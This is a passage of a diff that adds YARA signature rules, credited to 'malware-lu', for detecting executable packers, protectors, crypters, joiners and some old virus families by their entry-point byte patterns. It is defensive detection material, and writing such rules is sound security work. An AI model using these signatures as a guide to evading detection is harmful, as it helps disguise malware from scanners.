+		$a0 = { 1E 06 8C C8 8E D8 ?? ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv071
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ED 10 00 00 C3 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv070
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Ningishzida10CyberDoom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 96 E8 00 00 00 00 5D 81 ED 03 25 40 00 B9 04 1B 00 00 8D BD 4B 25 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectSKE21xdllAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PAVCryptorPawningAntiVirusCryptormasha_dev
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 BB 2C ?? ?? 70 BE 00 30 00 70 BF 20 ?? ?? 70 80 7B 28 00 75 16 83 3F 00 74 11 8B 17 89 D0 33 D2 89 17 8B E8 FF D5 83 3F 00 75 EF 83 3D 04 30 00 70 00 74 06 FF 15 54 30 00 70 80 7B 28 02 75 0A 83 3E 00 75 05 33 C0 89 43 0C FF 15 1C 30 00 70 80 7B 28 01 76 05 83 3E 00 74 22 8B 43 10 85 C0 74 1B FF 15 14 30 00 70 8B 53 10 8B 42 10 3B 42 04 74 0A 85 C0 74 06 50 E8 8F FA FF FF FF 15 20 30 00 70 80 7B 28 01 75 03 FF 53 24 80 7B 28 00 74 05 E8 35 FF FF FF 83 3B 00 75 17 83 3D 10 ?? ?? 70 00 74 06 FF 15 10 ?? ?? 70 8B 06 50 E8 A9 FA FF FF 8B 03 56 8B F0 8B FB B9 0B 00 00 00 F3 A5 5E E9 73 FF FF FF 5D 5F 5E 5B C3 A3 00 30 00 70 E8 26 FF FF FF C3 90 8F 05 04 30 00 70 E9 E9 FF FF FF C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExeShieldCryptor13RCTomCommander
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 8C 21 40 00 B9 51 2D 40 00 81 E9 E6 21 40 00 8B D5 81 C2 E6 21 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrinklerV01V02RuneLHStubbeandAskeSimonChristensen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGRUNT4Family
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 1C 00 8D 9E 41 01 40 3E 8B 96 14 03 B9 EA 00 87 DB F7 D0 31 17 83 C3 02 E2 F7 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule nPackV112002006BetaNEOxuinC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 EC 01 00 00 E8 F8 06 00 00 E8 03 06 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1800
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPEV22006115WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 50 45 3A 20 45 6E 63 72 79 70 74 50 45 20 56 32 2E 32 30 30 36 2E 31 2E 31 35 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrincessSandyv10eMiNENCEProcessPatcherPatch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 27 11 40 00 E8 3C 01 00 00 6A 00 E8 41 01 00 00 A3 00 20 40 00 8B 58 3C 03 D8 0F B7 43 14 0F B7 4B 06 8D 7C 18 18 81 3F 2E 4C 4F 41 74 0B 83 C7 28 49 75 F2 E9 A7 00 00 00 8B 5F 0C 03 1D 00 20 40 00 89 1D 04 20 40 00 8B FB 83 C7 04 68 4C 20 40 00 68 08 }
+
+condition:
+		$a0
+}
+	
+	
+rule aPackv082
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C CB BA ?? ?? 03 DA 8D ?? ?? ?? FC 33 F6 33 FF 48 4B 8E C0 8E DB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoiner01AsmVersionNEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 00 68 00 14 40 00 68 00 10 40 00 6A 00 E8 14 00 00 00 6A 00 E8 13 00 00 00 CC FF 25 AC 12 40 00 FF 25 B0 12 40 00 FF 25 B4 12 40 00 FF 25 B8 12 40 00 FF 25 BC 12 40 00 FF 25 C0 12 40 00 FF 25 C4 12 40 00 FF 25 C8 12 40 00 FF 25 CC 12 40 00 FF 25 D0 12 40 00 FF 25 D4 12 40 00 FF 25 D8 12 40 00 FF 25 DC 12 40 00 FF 25 E4 12 40 00 FF 25 EC 12 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsiduim1304ObsiduimSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02FSG131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CodeSafe20Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 0B 83 EC 10 53 56 57 E8 C4 01 00 85 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01NorthStarPEShrinker13Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ocBat2Exe10OC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 58 3C 40 00 E8 6C FA FF FF 33 C0 55 68 8A 3F 40 00 64 FF 30 64 89 20 6A 00 6A 00 6A 03 6A 00 6A 01 68 00 00 00 80 8D 55 EC 33 C0 E8 81 E9 FF FF 8B 45 EC E8 41 F6 FF FF 50 E8 F3 FA FF FF 8B F8 83 FF FF 0F 84 83 02 00 00 6A 02 6A 00 6A EE 57 E8 FC FA FF FF 6A 00 68 60 99 4F 00 6A 12 68 18 57 40 00 57 E8 E0 FA FF FF 83 3D 60 99 4F 00 12 0F 85 56 02 00 00 8D 45 E4 50 8D 45 E0 BA 18 57 40 00 B9 40 42 0F 00 E8 61 F4 FF FF 8B 45 E0 B9 12 00 00 00 BA 01 00 00 00 E8 3B F6 FF FF 8B 45 E4 8D 55 E8 E8 04 FB ?? ?? ?? ?? E8 B8 58 99 4F 00 E8 67 F3 FF FF 33 C0 A3 60 99 4F 00 8D 45 DC 50 B9 05 00 00 00 BA 01 00 00 00 A1 58 99 4F 00 E8 04 F6 FF FF 8B 45 DC BA A4 3F 40 00 E8 E3 F4 FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule ASDPack20asd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8D 49 00 1F 01 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 90 }
+	$a1 = { 5B 43 83 7B 74 00 0F 84 08 00 00 00 89 43 14 E9 }
+	$a2 = { 8B 44 24 04 56 57 53 E8 CD 01 00 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 }
+
+condition:
+		$a0 or $a1 or $a2 at pe.entry_point
+}
+	
+	
+rule EXECryptor2021protectedIAT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A4 ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? 94 ?? ?? ?? D8 ?? ?? ?? 00 00 00 00 FF FF FF FF B8 ?? ?? ?? D4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 }
+
+condition:
+		$a0
+}
+	
+	
+rule ShrinkWrapv14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UnknownbySMT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 ?? ?? 57 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01VOBProtectCD5Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack10Xbagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA 6A 00 FF 93 ?? ?? 00 00 89 C5 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 8B 86 88 00 00 00 09 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV18XV19XOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D ?? ?? ?? ?? FF FF FF FF FF FF FF FF 3D ?? ?? ?? ?? 00 00 58 25 00 F0 FF FF 33 FF 66 BB ?? ?? 66 83 ?? ?? 66 39 18 75 12 0F B7 50 3C 03 D0 BB ?? ?? ?? ?? 83 C3 ?? 39 1A 74 07 2D ?? ?? ?? ?? EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 2D ?? ?? ?? ?? B9 ?? ?? ?? ?? C6 00 E9 83 E9 05 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEjoinerAmok
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A1 14 A1 40 00 C1 E0 02 A3 18 A1 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEv124cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 ?? ?? ?? ?? E8 CB FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv04xv05x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov301v305
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DingBoysPElockv007
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule mPack003DeltaAziz
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 33 C0 89 45 F0 B8 A8 76 00 10 E8 67 C4 FF FF 33 C0 55 68 C2 78 00 10 64 FF 30 64 89 20 8D 55 F0 33 C0 E8 93 C8 FF FF 8B 45 F0 E8 87 CB FF FF A3 08 A5 00 10 33 C0 55 68 A5 78 00 10 64 FF 30 64 89 20 A1 08 A5 00 10 E8 FA C9 FF FF 83 F8 FF 75 0A E8 88 B2 FF FF E9 1B 01 00 00 C7 05 14 A5 00 10 32 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 C9 C9 FF FF BA 14 A5 00 10 A1 08 A5 00 10 B9 04 00 00 00 E8 C5 C9 FF FF 83 3D 14 A5 00 10 32 77 0A E8 47 B2 FF FF E9 DA 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 92 C9 FF FF BA 18 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SixtoFourv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 55 4C 50 83 ?? ?? FC BF ?? ?? BE ?? ?? B5 ?? 57 F3 A5 C3 33 ED }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FreeJoinerSmallbuild029GlOFF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 32 C4 8A C3 58 E8 DE FD FF FF 6A 00 E8 0D 00 00 00 CC FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10 40 00 FF 25 90 10 40 00 FF 25 94 10 40 00 FF 25 98 10 40 00 FF 25 9C 10 40 00 FF 25 A0 10 40 00 FF 25 A4 10 40 00 FF 25 AC 10 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaWinLicenseV1XNoCompressionSecureEngineOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B C5 8B D4 60 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 0C 8B E8 8B E2 B8 01 00 00 00 C2 0C 00 8B 44 24 24 89 85 ?? ?? ?? ?? 6A 45 E8 A3 00 00 00 68 9A 74 83 07 E8 DF 00 00 00 68 25 4B 89 0A E8 D5 00 00 00 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule WinUpackv030betaByDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 }
+	$a1 = { E9 ?? ?? ?? ?? 42 79 44 77 69 6E 67 40 00 00 00 50 45 00 00 4C 01 02 }
+
+condition:
+		$a0 or $a1
+}
+	
+	
+rule Armadillov260b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov260b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeLockerv10IonIce
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 3E 8F 85 6C 00 00 00 3E 8F 85 68 00 00 00 3E 8F 85 64 00 00 00 3E 8F 85 60 00 00 00 3E 8F 85 5C 00 00 00 3E 8F 85 58 00 00 00 3E 8F 85 54 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV10betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC300400450EXEX86CRTDLL
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 53 56 57 89 65 E8 C7 45 FC ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 BE ?? ?? ?? ?? EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BeRoEXEPackerv100LZBRRBeRoFarbrausch
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? BF ?? ?? ?? ?? FC B2 80 33 DB A4 B3 02 E8 ?? ?? ?? ?? 73 F6 33 C9 E8 ?? ?? ?? ?? 73 1C 33 C0 E8 ?? ?? ?? ?? 73 23 B3 02 41 B0 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WWPACKv305c4Modified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 B1 ?? 51 8C D3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule APatchGUIv11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 52 31 C0 E8 FF FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeSafeguardv10simonzh
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C0 5D EB 4E EB 47 DF 69 4E 58 DF 59 74 F3 EB 01 DF 75 EE 9A 59 9C 81 C1 E2 FF FF FF EB 01 DF 9D FF E1 E8 51 E8 EB FF FF FF DF 22 3F 9A C0 81 ED 19 18 40 00 EB 48 EB 47 DF 69 4E 58 DF 59 79 EE EB 01 DF 78 E9 DF 59 9C 81 C1 E5 FF FF FF 9D FF E1 EB 51 E8 EE }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01CDCopsIIAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD 90 90 90 90 8D 45 90 8D 5D 90 E8 00 00 00 00 8D 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeVIRUSIWormHybrisFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 EB 16 A8 54 00 00 47 41 42 4C 4B 43 47 43 00 00 00 00 00 00 52 49 53 00 FC 68 4C 70 40 00 FF 15 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1322ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateEXEProtector20SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 ?? ?? 38 00 00 00 8B ?? 00 00 00 00 81 ?? ?? ?? ?? ?? 89 ?? 00 00 00 00 81 ?? 04 00 00 00 81 ?? 04 00 00 00 81 ?? 00 00 00 00 0F 85 D6 FF FF FF }
+
+condition:
+		$a0
+}
+	
+	
+rule NTkrnlSecureSuite01015DLLNTkrnlSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 8B 44 24 04 05 ?? ?? ?? ?? 50 E8 01 00 00 00 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule UPXHiTv001DJSiba
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }
+
+condition:
+		$a0
+}
+	
+	
+rule Vpackerttui
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 89 C6 C7 45 E0 01 00 00 00 F7 03 00 00 FF FF 75 18 0F B7 03 50 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 EB 13 53 8B 45 D8 50 FF 55 F8 89 07 8B C3 E8 ?? FE FF FF 8B D8 83 C7 04 FF 45 E0 4E 75 C4 8B F3 83 3E 00 75 88 8B 45 E4 8B 40 10 03 45 DC 8B 55 14 83 C2 20 89 02 68 00 80 00 00 6A 00 8B 45 D4 50 FF 55 EC 8B 55 DC 8B 42 3C 03 45 DC 83 C0 04 8B D8 83 C3 14 8D 45 E0 50 6A 40 68 00 10 00 00 52 FF 55 E8 8D 43 60 }
+
+condition:
+		$a0
+}
+	
+	
+rule IProtect10FxlibdllmodebyFuXdas
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 33 2E 46 55 58 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 46 78 4C 69 62 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 60 E8 00 00 00 00 5D 81 ED 71 10 40 00 FF 74 24 20 E8 40 00 00 00 0B C0 74 2F 89 85 63 10 40 00 8D 85 3C 10 40 00 50 FF B5 63 10 40 00 E8 92 00 00 00 0B C0 74 13 89 85 5F 10 40 00 8D 85 49 10 40 00 50 FF 95 5F 10 40 00 8B 85 67 10 40 00 89 44 24 1C 61 FF E0 8B 7C 24 04 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 81 E7 00 00 FF FF 66 81 3F 4D 5A 75 0F 8B F7 03 76 3C 81 3E 50 45 00 00 75 02 EB 17 81 EF 00 00 01 00 81 FF 00 00 00 70 73 07 BF 00 00 F7 BF EB 02 EB D3 97 64 8F 05 00 00 00 00 83 C4 04 C2 04 00 8D 85 00 10 40 00 50 64 FF 35 00 00 00 00 8D 85 53 10 40 00 89 20 89 68 04 8D 9D 0A 11 40 00 89 58 08 64 89 25 00 00 00 00 8B 74 24 0C 66 81 3E 4D 5A 74 05 E9 8A 00 00 00 03 76 3C 81 3E 50 45 00 00 74 02 EB 7D 8B 7C 24 10 B9 96 00 00 00 32 C0 F2 AE 8B CF 2B 4C 24 10 8B 56 78 03 54 24 0C 8B 5A 20 03 5C 24 0C 33 C0 8B 3B 03 7C 24 0C 8B 74 24 10 51 F3 A6 75 05 83 C4 04 EB 0A 59 83 C3 04 40 3B 42 18 75 E2 3B 42 18 75 02 EB 35 8B 72 24 03 74 24 0C 52 BB 02 00 00 00 33 D2 F7 E3 5A 03 C6 33 C9 66 8B 08 8B 7A 1C 33 D2 BB 04 00 00 00 8B C1 F7 E3 03 44 24 0C 03 C7 8B 00 03 44 24 0C EB 02 33 C0 64 8F 05 00 00 00 00 83 C4 04 C2 08 00 E8 FA FD FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02DxPack10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 8B FD 81 ED 90 90 90 90 2B B9 00 00 00 00 81 EF 90 90 90 90 83 BD 90 90 90 90 90 0F 84 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SecureEXE30ZipWorx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 B8 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv12CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 45 78 50 72 2D 76 2E 31 2E 32 2E }
